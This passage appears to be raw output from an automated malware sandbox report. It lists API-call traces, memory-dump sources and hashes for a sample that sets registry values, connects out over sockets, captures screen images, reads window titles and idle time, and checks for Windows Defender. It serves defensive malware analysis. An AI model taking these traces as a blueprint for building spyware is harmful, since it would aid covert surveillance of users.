                                                                                                                            • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 02C35563
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02C35586
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C355B1
                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02C35605
                                                                                                                            • _memset.LIBCMT ref: 02C35669
                                                                                                                            • _memset.LIBCMT ref: 02C3568D
                                                                                                                            • _memset.LIBCMT ref: 02C3569F
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02C35726
                                                                                                                            • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 02C35799
                                                                                                                            • RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 02C357AC
                                                                                                                            • RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 02C357C4
                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 02C357CE
                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 02C357FE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                                                                                                            • String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
                                                                                                                            • API String ID: 354323817-737951744
                                                                                                                            • Opcode ID: c450282505fd281f9c4c8934b55dd889cd746892e042020ba7aaab6f6a1646a9
                                                                                                                            • Instruction ID: d4a013a07119568b37847c83aeb14be6054f2cfe7d7676578ede7858d5e5448c
                                                                                                                            • Opcode Fuzzy Hash: c450282505fd281f9c4c8934b55dd889cd746892e042020ba7aaab6f6a1646a9
                                                                                                                            • Instruction Fuzzy Hash: 1A91A479E40304ABE721DF60DC84FAB77BAEB89744F504959F909AB240D771AB40CF91

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03629E7B
                                                                                                                            • GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03629EFC
                                                                                                                            • GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03629F24
                                                                                                                            • GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03629F7F
                                                                                                                            • _malloc.LIBCMT ref: 03629FC0
                                                                                                                              • Part of subcall function 0362F673: __FF_MSGBANNER.LIBCMT ref: 0362F68C
                                                                                                                              • Part of subcall function 0362F673: __NMSG_WRITE.LIBCMT ref: 0362F693
                                                                                                                              • Part of subcall function 0362F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76), ref: 0362F6B8
                                                                                                                            • _free.LIBCMT ref: 0362A000
                                                                                                                            • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 0362A028
                                                                                                                            • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 0362A0B7
                                                                                                                            • GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 0362A112
                                                                                                                            • _free.LIBCMT ref: 0362A134
                                                                                                                            • _memcpy_s.LIBCMT ref: 0362A183
                                                                                                                            • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 0362A1D0
                                                                                                                            • GdipCreateBitmapFromScan0.GDIPLUS(?,?,03645A78,00022009,?,00000000,?,00000000), ref: 0362A22C
                                                                                                                            • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 0362A24C
                                                                                                                            • GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 0362A267
                                                                                                                            • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 0362A274
                                                                                                                            • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 0362A27B
                                                                                                                            • _free.LIBCMT ref: 0362A296
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                                                                                                            • String ID: &
                                                                                                                            • API String ID: 640422297-3042966939
                                                                                                                            • Opcode ID: d423f7cf029198dc9e4e6fb905e4b460d0d3a8a90101aa65d4bc18fb96cffbe2
                                                                                                                            • Instruction ID: c8ee938b0a71d71562aaab7002a56684c576aa7613ac008a2b06702fc063283e
                                                                                                                            • Opcode Fuzzy Hash: d423f7cf029198dc9e4e6fb905e4b460d0d3a8a90101aa65d4bc18fb96cffbe2
                                                                                                                            • Instruction Fuzzy Hash: 0CD191B1A006299FCB20DF55CC90B9ABBF4FF88304F0585ACE60997301D770AA95CF68

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 02C32D9B
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02C32DA7
                                                                                                                            • timeGetTime.WINMM ref: 02C32DAD
                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 02C32DDA
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02C32E06
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02C32E12
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02C32E31
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02C32E3D
                                                                                                                            • gethostbyname.WS2_32(00000000), ref: 02C32E4B
                                                                                                                            • htons.WS2_32(?), ref: 02C32E6D
                                                                                                                            • connect.WS2_32(?,?,00000010), ref: 02C32E8B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                                            • String ID: 0u
                                                                                                                            • API String ID: 640718063-3203441087
                                                                                                                            • Opcode ID: fb5e61656e51c59e0b92eff49c4f1043215102ab6c4a7dc5608a66c0beb82d4b
                                                                                                                            • Instruction ID: 896bae40c66fc638840eccb5fbfd04d5fc782b9c65d0286ba38154905857bbc6
                                                                                                                            • Opcode Fuzzy Hash: fb5e61656e51c59e0b92eff49c4f1043215102ab6c4a7dc5608a66c0beb82d4b
                                                                                                                            • Instruction Fuzzy Hash: 3F6130B5A40304ABE720DFA4DC45FABB7F9FF58710F504A19F645A72C0D7B0A9048BA5

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 03622DBB
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 03622DC7
                                                                                                                            • timeGetTime.WINMM ref: 03622DCD
                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 03622DFA
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03622E26
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03622E32
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 03622E51
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03622E5D
                                                                                                                            • gethostbyname.WS2_32(00000000), ref: 03622E6B
                                                                                                                            • htons.WS2_32(?), ref: 03622E8D
                                                                                                                            • connect.WS2_32(?,?,00000010), ref: 03622EAB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                                            • String ID: 0u
                                                                                                                            • API String ID: 640718063-3203441087
                                                                                                                            • Opcode ID: ac6e9980b7ad823909b57b3d0cdbc70ca14d0a21d644c76636de50cffc86bc49
                                                                                                                            • Instruction ID: 071dbe64f0937f74dcea11fd59893b1f0e7337295e35a7b3edcce34a087f3d05
                                                                                                                            • Opcode Fuzzy Hash: ac6e9980b7ad823909b57b3d0cdbc70ca14d0a21d644c76636de50cffc86bc49
                                                                                                                            • Instruction Fuzzy Hash: D5615DB5A40704ABE720EFA4DC55FAABBB8FF48B10F10451DF655AB284D7B0A9048B64

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 0362AD53
                                                                                                                            • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0362AD73
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: OpenQueryValue
                                                                                                                            • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                                                                            • API String ID: 4153817207-1338088003

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0362618B
                                                                                                                            • lstrcatW.KERNEL32(03651F10,0364510C,?,95401134,00000AD4,00000000,75BF73E0), ref: 036261CD
                                                                                                                            • lstrcatW.KERNEL32(03651F10,0364535C,?,95401134,00000AD4,00000000,75BF73E0), ref: 036261D9
                                                                                                                            • CoCreateInstance.OLE32(03642480,00000000,00000017,0364578C,?,?,95401134,00000AD4,00000000,75BF73E0), ref: 03626220
                                                                                                                            • _memset.LIBCMT ref: 036262CE
                                                                                                                            • wsprintfW.USER32 ref: 03626336
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0362635F
                                                                                                                            • _memset.LIBCMT ref: 03626376
                                                                                                                              • Part of subcall function 03626050: _memset.LIBCMT ref: 0362607C
                                                                                                                              • Part of subcall function 03626050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03626088
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                                                                            • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                                            • API String ID: 1221949200-1583895642

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 03625F66
                                                                                                                            • GetLastError.KERNEL32 ref: 03625F6E
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 03625F85
                                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 03625F90
                                                                                                                            • GetLastError.KERNEL32 ref: 03625F92
                                                                                                                            • _memset.LIBCMT ref: 03625FB9
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 03625FC6
                                                                                                                            • lstrcmpW.KERNEL32(?,03645328), ref: 03625FED
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 03625FF8
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 03626005
                                                                                                                            • GetConsoleWindow.KERNEL32 ref: 0362600F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                                                                            • String ID: 2024.12. 3$key$open
                                                                                                                            • API String ID: 2922109467-4129338558

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 036262CE
                                                                                                                            • wsprintfW.USER32 ref: 03626336
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0362635F
                                                                                                                            • _memset.LIBCMT ref: 03626376
                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 036263B2
                                                                                                                            • lstrcatW.KERNEL32(03651F10,?), ref: 036263CE
                                                                                                                            • lstrcatW.KERNEL32(03651F10,0364535C), ref: 036263DA
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 036263E3
                                                                                                                            • lstrlenW.KERNEL32(03651F10,?,95401134,00000AD4,00000000,75BF73E0), ref: 03626427
                                                                                                                            • lstrcatW.KERNEL32(03651F10,036453D4,?,95401134,00000AD4,00000000,75BF73E0), ref: 0362643B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                                                                            • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                                            • API String ID: 1671694837-1583895642

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GlobalAlloc.KERNEL32(00000002,?,95401134,?,00000000,?), ref: 0362C09E
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0362C0AA
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0362C0BF
                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0362C0D5
                                                                                                                            • EnterCriticalSection.KERNEL32(0364FB64), ref: 0362C113
                                                                                                                            • LeaveCriticalSection.KERNEL32(0364FB64), ref: 0362C124
                                                                                                                              • Part of subcall function 03629DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03629E04
                                                                                                                              • Part of subcall function 03629DE0: GdipDisposeImage.GDIPLUS(?), ref: 03629E18
                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0362C14C
                                                                                                                              • Part of subcall function 0362A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0362A48D
                                                                                                                              • Part of subcall function 0362A460: _free.LIBCMT ref: 0362A503
                                                                                                                            • GetHGlobalFromStream.OLE32(?,?), ref: 0362C16D
                                                                                                                            • GlobalLock.KERNEL32(?), ref: 0362C177
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0362C18F
                                                                                                                              • Part of subcall function 03629BA0: DeleteObject.GDI32(?), ref: 03629BD2
                                                                                                                              • Part of subcall function 03629BA0: EnterCriticalSection.KERNEL32(0364FB64,?,?,?,03629B7B), ref: 03629BE3
                                                                                                                              • Part of subcall function 03629BA0: EnterCriticalSection.KERNEL32(0364FB64,?,?,?,03629B7B), ref: 03629BF8
                                                                                                                              • Part of subcall function 03629BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,03629B7B), ref: 03629C04
                                                                                                                              • Part of subcall function 03629BA0: LeaveCriticalSection.KERNEL32(0364FB64,?,?,?,03629B7B), ref: 03629C15
                                                                                                                              • Part of subcall function 03629BA0: LeaveCriticalSection.KERNEL32(0364FB64,?,?,?,03629B7B), ref: 03629C1C
                                                                                                                            • GlobalSize.KERNEL32(00000000), ref: 0362C1A5
                                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 0362C221
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0362C249
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1483550337-0

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 036264C2
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 036264E2
                                                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 03626524
                                                                                                                            • _memset.LIBCMT ref: 03626560
                                                                                                                            • _memset.LIBCMT ref: 0362658E
                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75BF73E0), ref: 036265BA
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 036265C3
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 036265D5
                                                                                                                            • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 03626625
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 03626635
                                                                                                                            Strings
                                                                                                                            • Software\Tencent\Plugin\VAS, xrefs: 036264D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Similarity
                                                                                                                            • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                                                                            • String ID: Software\Tencent\Plugin\VAS
                                                                                                                            APIs
                                                                                                                            • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0362A48D
                                                                                                                            • _malloc.LIBCMT ref: 0362A4D1
                                                                                                                            • _free.LIBCMT ref: 0362A503
                                                                                                                            • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 0362A522
                                                                                                                            • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 0362A594
                                                                                                                            • GdipDisposeImage.GDIPLUS(00000000), ref: 0362A59F
                                                                                                                            • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0362A5C5
                                                                                                                            • GdipDisposeImage.GDIPLUS(00000000), ref: 0362A5DD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Similarity
                                                                                                                            • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                                                                            • String ID: &
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02C35382
                                                                                                                            • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02C35392
                                                                                                                            • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,02C4C6E0,000012A0), ref: 02C353B0
                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 02C353BB
                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02C3540F
                                                                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 02C3541B
                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 02C35434
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Similarity
                                                                                                                            • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                                            • String ID: IpDates_info$SOFTWARE
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02C35382
                                                                                                                            • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02C35392
                                                                                                                            • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,02C4C6E0,000012A0), ref: 02C353B0
                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 02C353BB
                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02C3540F
                                                                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 02C3541B
                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 02C35434
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Similarity
                                                                                                                            • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                                            • String ID: IpDates_info$SOFTWARE
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,036412F8,95401134,00000001,00000000,00000000), ref: 0362CAB1
                                                                                                                            • RegQueryInfoKeyW.ADVAPI32(036412F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0362CAE0
                                                                                                                            • _memset.LIBCMT ref: 0362CB44
                                                                                                                            • _memset.LIBCMT ref: 0362CB53
                                                                                                                            • RegEnumValueW.KERNEL32(036412F8,?,00000000,?,00000000,?,00000000,?), ref: 0362CB72
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                              • Part of subcall function 0362F707: std::exception::exception.LIBCMT ref: 0362F756
                                                                                                                              • Part of subcall function 0362F707: std::exception::exception.LIBCMT ref: 0362F770
                                                                                                                              • Part of subcall function 0362F707: __CxxThrowException@8.LIBCMT ref: 0362F781
                                                                                                                            • RegCloseKey.KERNEL32(036412F8,?,?,?,?,?,?,?,?,?,?,?,00000000,036412F8,000000FF), ref: 0362CC83
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Similarity
                                                                                                                            • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                                                                            • String ID: Console\0
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                            • _memset.LIBCMT ref: 0362BB21
                                                                                                                            • GetLastInputInfo.USER32(?), ref: 0362BB37
                                                                                                                            • GetTickCount.KERNEL32 ref: 0362BB3D
                                                                                                                            • wsprintfW.USER32 ref: 0362BB66
                                                                                                                            • GetForegroundWindow.USER32 ref: 0362BB6F
                                                                                                                            • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 0362BB83
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                                                                            • String ID: %d min
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcessId.KERNEL32(95401134,00000000,00000000,75BF73E0,?,00000000,036410DB,000000FF,?,03626AB3,00000000), ref: 03626938
                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,036410DB,000000FF,?,03626AB3,00000000), ref: 03626947
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,036410DB,000000FF,?,03626AB3,00000000), ref: 03626960
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,036410DB,000000FF,?,03626AB3,00000000), ref: 0362696B
                                                                                                                            • SysStringLen.OLEAUT32(00000000), ref: 036269BE
                                                                                                                            • SysStringLen.OLEAUT32(00000000), ref: 036269CC
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,036410DB,000000FF), ref: 03626A2E
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,036410DB,000000FF), ref: 03626A34
                                                                                                                            Memory Dump Source
